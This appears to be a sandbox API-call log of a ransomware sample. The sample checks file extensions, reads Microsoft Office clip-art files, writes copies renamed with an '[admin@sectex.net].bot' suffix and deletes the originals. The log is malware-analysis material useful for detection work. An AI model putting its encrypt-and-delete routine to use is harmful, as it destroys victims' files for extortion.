	[0162.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107492.WMF") returned 63
	[0162.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107492.WMF") returned 63
	[0162.220] lstrlenW (lpString=".doc") returned 4
	[0162.220] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0162.220] lstrlenW (lpString=".docx") returned 5
	[0162.220] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0162.220] lstrlenW (lpString=".pdf") returned 4
	[0162.220] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0162.220] lstrlenW (lpString=".xls") returned 4
	[0162.220] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0162.220] lstrlenW (lpString=".xlsx") returned 5
	[0162.220] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0162.221] lstrlenW (lpString=".ppt") returned 4
	[0162.221] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0162.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107492.WMF") returned 63
	[0162.221] lstrlenW (lpString=".zip") returned 4
	[0162.221] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0162.221] lstrlenW (lpString=".rar") returned 4
	[0162.221] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0162.221] lstrlenW (lpString=".bz2") returned 4
	[0162.221] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0162.221] lstrlenW (lpString=".7z") returned 3
	[0162.221] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0162.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107492.WMF") returned 63
	[0162.221] lstrlenW (lpString=".dbf") returned 4
	[0162.221] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0162.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107492.WMF") returned 63
	[0162.221] lstrlenW (lpString=".1cd") returned 4
	[0162.221] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0162.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107492.WMF") returned 63
	[0162.221] lstrlenW (lpString=".jpg") returned 4
	[0162.221] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0162.221] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0162.221] lstrlenW (lpString="J0107494.WMF") returned 12
	[0162.221] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107494.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107494.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0162.222] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=6424) returned 1
	[0162.222] CloseHandle (hObject=0x3b8) returned 1
	[0162.222] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107494.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107494.wmf")) returned 0x20
	[0162.222] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107494.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107494.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0162.222] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107494.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107494.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0162.222] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.222] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.223] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107494.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107494.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0162.223] GetLastError () returned 0x0
	[0162.223] ReadFile (in: hFile=0x3b8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x1918, lpOverlapped=0x0) returned 1
	[0162.225] WriteFile (in: hFile=0x25c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x1920, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x1920, lpOverlapped=0x0) returned 1
	[0162.226] ReadFile (in: hFile=0x3b8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0162.226] WriteFile (in: hFile=0x25c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0162.226] SetEndOfFile (hFile=0x25c) returned 1
	[0162.226] CloseHandle (hObject=0x25c) returned 1
	[0162.226] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.226] SetEndOfFile (hFile=0x3b8) returned 1
	[0162.228] CloseHandle (hObject=0x3b8) returned 1
	[0162.228] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107494.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0162.229] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107494.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107494.wmf")) returned 1
	[0162.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107494.WMF") returned 63
	[0162.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107494.WMF") returned 63
	[0162.229] lstrlenW (lpString=".doc") returned 4
	[0162.229] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0162.229] lstrlenW (lpString=".docx") returned 5
	[0162.229] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0162.229] lstrlenW (lpString=".pdf") returned 4
	[0162.229] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0162.229] lstrlenW (lpString=".xls") returned 4
	[0162.229] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0162.229] lstrlenW (lpString=".xlsx") returned 5
	[0162.229] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0162.229] lstrlenW (lpString=".ppt") returned 4
	[0162.229] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0162.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107494.WMF") returned 63
	[0162.230] lstrlenW (lpString=".zip") returned 4
	[0162.230] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0162.230] lstrlenW (lpString=".rar") returned 4
	[0162.230] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0162.230] lstrlenW (lpString=".bz2") returned 4
	[0162.230] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0162.230] lstrlenW (lpString=".7z") returned 3
	[0162.230] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0162.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107494.WMF") returned 63
	[0162.230] lstrlenW (lpString=".dbf") returned 4
	[0162.230] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0162.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107494.WMF") returned 63
	[0162.230] lstrlenW (lpString=".1cd") returned 4
	[0162.230] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0162.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107494.WMF") returned 63
	[0162.230] lstrlenW (lpString=".jpg") returned 4
	[0162.230] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0162.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107494.WMF") returned 63
	[0162.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107494.WMF") returned 63
	[0162.230] lstrlenW (lpString=".doc") returned 4
	[0162.230] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0162.230] lstrlenW (lpString=".docx") returned 5
	[0162.230] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0162.230] lstrlenW (lpString=".pdf") returned 4
	[0162.230] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0162.230] lstrlenW (lpString=".xls") returned 4
	[0162.230] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0162.230] lstrlenW (lpString=".xlsx") returned 5
	[0162.230] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0162.230] lstrlenW (lpString=".ppt") returned 4
	[0162.231] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0162.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107494.WMF") returned 63
	[0162.231] lstrlenW (lpString=".zip") returned 4
	[0162.231] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0162.231] lstrlenW (lpString=".rar") returned 4
	[0162.231] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0162.231] lstrlenW (lpString=".bz2") returned 4
	[0162.231] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0162.231] lstrlenW (lpString=".7z") returned 3
	[0162.231] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0162.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107494.WMF") returned 63
	[0162.231] lstrlenW (lpString=".dbf") returned 4
	[0162.231] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0162.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107494.WMF") returned 63
	[0162.231] lstrlenW (lpString=".1cd") returned 4
	[0162.231] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0162.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107494.WMF") returned 63
	[0162.231] lstrlenW (lpString=".jpg") returned 4
	[0162.231] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0162.231] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0162.231] lstrlenW (lpString="J0107496.WMF") returned 12
	[0162.231] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107496.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107496.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0162.232] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=8864) returned 1
	[0162.232] CloseHandle (hObject=0x3b8) returned 1
	[0162.232] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107496.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107496.wmf")) returned 0x20
	[0162.232] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107496.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107496.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0162.232] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107496.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107496.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0162.232] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.233] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.233] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107496.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107496.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0162.233] GetLastError () returned 0x0
	[0162.233] ReadFile (in: hFile=0x3b8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x22a0, lpOverlapped=0x0) returned 1
	[0162.235] WriteFile (in: hFile=0x25c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x22b0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x22b0, lpOverlapped=0x0) returned 1
	[0162.236] ReadFile (in: hFile=0x3b8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0162.236] WriteFile (in: hFile=0x25c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0162.236] SetEndOfFile (hFile=0x25c) returned 1
	[0162.236] CloseHandle (hObject=0x25c) returned 1
	[0162.236] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.236] SetEndOfFile (hFile=0x3b8) returned 1
	[0162.238] CloseHandle (hObject=0x3b8) returned 1
	[0162.239] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107496.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0162.239] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107496.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107496.wmf")) returned 1
	[0162.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107496.WMF") returned 63
	[0162.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107496.WMF") returned 63
	[0162.239] lstrlenW (lpString=".doc") returned 4
	[0162.239] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0162.240] lstrlenW (lpString=".docx") returned 5
	[0162.240] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0162.240] lstrlenW (lpString=".pdf") returned 4
	[0162.240] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0162.240] lstrlenW (lpString=".xls") returned 4
	[0162.240] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0162.240] lstrlenW (lpString=".xlsx") returned 5
	[0162.240] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0162.240] lstrlenW (lpString=".ppt") returned 4
	[0162.240] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0162.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107496.WMF") returned 63
	[0162.240] lstrlenW (lpString=".zip") returned 4
	[0162.240] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0162.240] lstrlenW (lpString=".rar") returned 4
	[0162.240] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0162.240] lstrlenW (lpString=".bz2") returned 4
	[0162.240] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0162.240] lstrlenW (lpString=".7z") returned 3
	[0162.240] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0162.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107496.WMF") returned 63
	[0162.240] lstrlenW (lpString=".dbf") returned 4
	[0162.240] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0162.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107496.WMF") returned 63
	[0162.240] lstrlenW (lpString=".1cd") returned 4
	[0162.240] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0162.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107496.WMF") returned 63
	[0162.240] lstrlenW (lpString=".jpg") returned 4
	[0162.240] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0162.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107496.WMF") returned 63
	[0162.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107496.WMF") returned 63
	[0162.240] lstrlenW (lpString=".doc") returned 4
	[0162.240] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0162.241] lstrlenW (lpString=".docx") returned 5
	[0162.241] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0162.241] lstrlenW (lpString=".pdf") returned 4
	[0162.241] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0162.241] lstrlenW (lpString=".xls") returned 4
	[0162.241] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0162.241] lstrlenW (lpString=".xlsx") returned 5
	[0162.241] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0162.241] lstrlenW (lpString=".ppt") returned 4
	[0162.241] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0162.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107496.WMF") returned 63
	[0162.241] lstrlenW (lpString=".zip") returned 4
	[0162.241] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0162.241] lstrlenW (lpString=".rar") returned 4
	[0162.241] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0162.241] lstrlenW (lpString=".bz2") returned 4
	[0162.241] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0162.241] lstrlenW (lpString=".7z") returned 3
	[0162.241] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0162.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107496.WMF") returned 63
	[0162.241] lstrlenW (lpString=".dbf") returned 4
	[0162.241] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0162.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107496.WMF") returned 63
	[0162.241] lstrlenW (lpString=".1cd") returned 4
	[0162.241] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0162.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107496.WMF") returned 63
	[0162.241] lstrlenW (lpString=".jpg") returned 4
	[0162.241] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0162.241] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0162.242] lstrlenW (lpString="J0107500.WMF") returned 12
	[0162.242] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107500.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107500.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0162.243] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=4200) returned 1
	[0162.243] CloseHandle (hObject=0x3b8) returned 1
	[0162.244] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107500.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107500.wmf")) returned 0x20
	[0162.244] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107500.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107500.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0162.244] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107500.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107500.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0162.244] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.244] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.244] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107500.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107500.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0162.245] GetLastError () returned 0x0
	[0162.245] ReadFile (in: hFile=0x3b8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x1068, lpOverlapped=0x0) returned 1
	[0162.453] WriteFile (in: hFile=0x25c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x1070, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x1070, lpOverlapped=0x0) returned 1
	[0162.454] ReadFile (in: hFile=0x3b8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0162.454] WriteFile (in: hFile=0x25c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0162.454] SetEndOfFile (hFile=0x25c) returned 1
	[0162.454] CloseHandle (hObject=0x25c) returned 1
	[0162.455] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.455] SetEndOfFile (hFile=0x3b8) returned 1
	[0162.457] CloseHandle (hObject=0x3b8) returned 1
	[0162.457] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107500.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0162.483] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107500.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107500.wmf")) returned 1
	[0162.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107500.WMF") returned 63
	[0162.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107500.WMF") returned 63
	[0162.484] lstrlenW (lpString=".doc") returned 4
	[0162.484] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0162.484] lstrlenW (lpString=".docx") returned 5
	[0162.484] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0162.484] lstrlenW (lpString=".pdf") returned 4
	[0162.484] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0162.484] lstrlenW (lpString=".xls") returned 4
	[0162.484] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0162.484] lstrlenW (lpString=".xlsx") returned 5
	[0162.484] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0162.484] lstrlenW (lpString=".ppt") returned 4
	[0162.484] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0162.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107500.WMF") returned 63
	[0162.484] lstrlenW (lpString=".zip") returned 4
	[0162.484] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0162.484] lstrlenW (lpString=".rar") returned 4
	[0162.484] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0162.484] lstrlenW (lpString=".bz2") returned 4
	[0162.484] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0162.485] lstrlenW (lpString=".7z") returned 3
	[0162.485] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0162.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107500.WMF") returned 63
	[0162.485] lstrlenW (lpString=".dbf") returned 4
	[0162.485] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0162.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107500.WMF") returned 63
	[0162.485] lstrlenW (lpString=".1cd") returned 4
	[0162.485] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0162.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107500.WMF") returned 63
	[0162.485] lstrlenW (lpString=".jpg") returned 4
	[0162.485] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0162.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107500.WMF") returned 63
	[0162.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107500.WMF") returned 63
	[0162.485] lstrlenW (lpString=".doc") returned 4
	[0162.485] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0162.485] lstrlenW (lpString=".docx") returned 5
